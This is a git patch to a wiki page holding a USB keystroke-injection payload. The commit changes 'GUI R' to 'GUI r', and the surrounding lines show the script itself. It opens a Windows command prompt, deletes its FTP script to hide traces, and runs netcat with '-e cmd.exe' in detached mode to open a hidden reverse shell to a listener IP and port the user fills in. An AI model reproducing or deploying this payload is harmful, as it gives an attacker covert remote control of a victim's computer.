From 66ba1bebdda0d5320ed9ae7748b186727c70b595 Mon Sep 17 00:00:00 2001 From: Tim Mattison Date: Tue, 22 Jul 2014 16:22:30 -0700 Subject: [PATCH] "GUI R" -> "GUI r" --- Payload---netcat-FTP-download-and-reverse-shell.rdoc | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Payload---netcat-FTP-download-and-reverse-shell.rdoc b/Payload---netcat-FTP-download-and-reverse-shell.rdoc index 0568932..73a76b3 100644 --- a/Payload---netcat-FTP-download-and-reverse-shell.rdoc +++ b/Payload---netcat-FTP-download-and-reverse-shell.rdoc @@ -7,7 +7,7 @@ This script will: Fill in the required information where you see the brackets. ```c DELAY 10000 -GUI R +GUI r DELAY 200 STRING cmd ENTER @@ -41,12 +41,12 @@ ENTER STRING del ftp.txt & exit ENTER DELAY 2000 -GUI R +GUI r DELAY 200 STRING nc.exe [LISTENER IP] [LISTENER PORT] -e cmd.exe -d ENTER DELAY 2000 -GUI R +GUI r DELAY 200 STRING cmd ENTER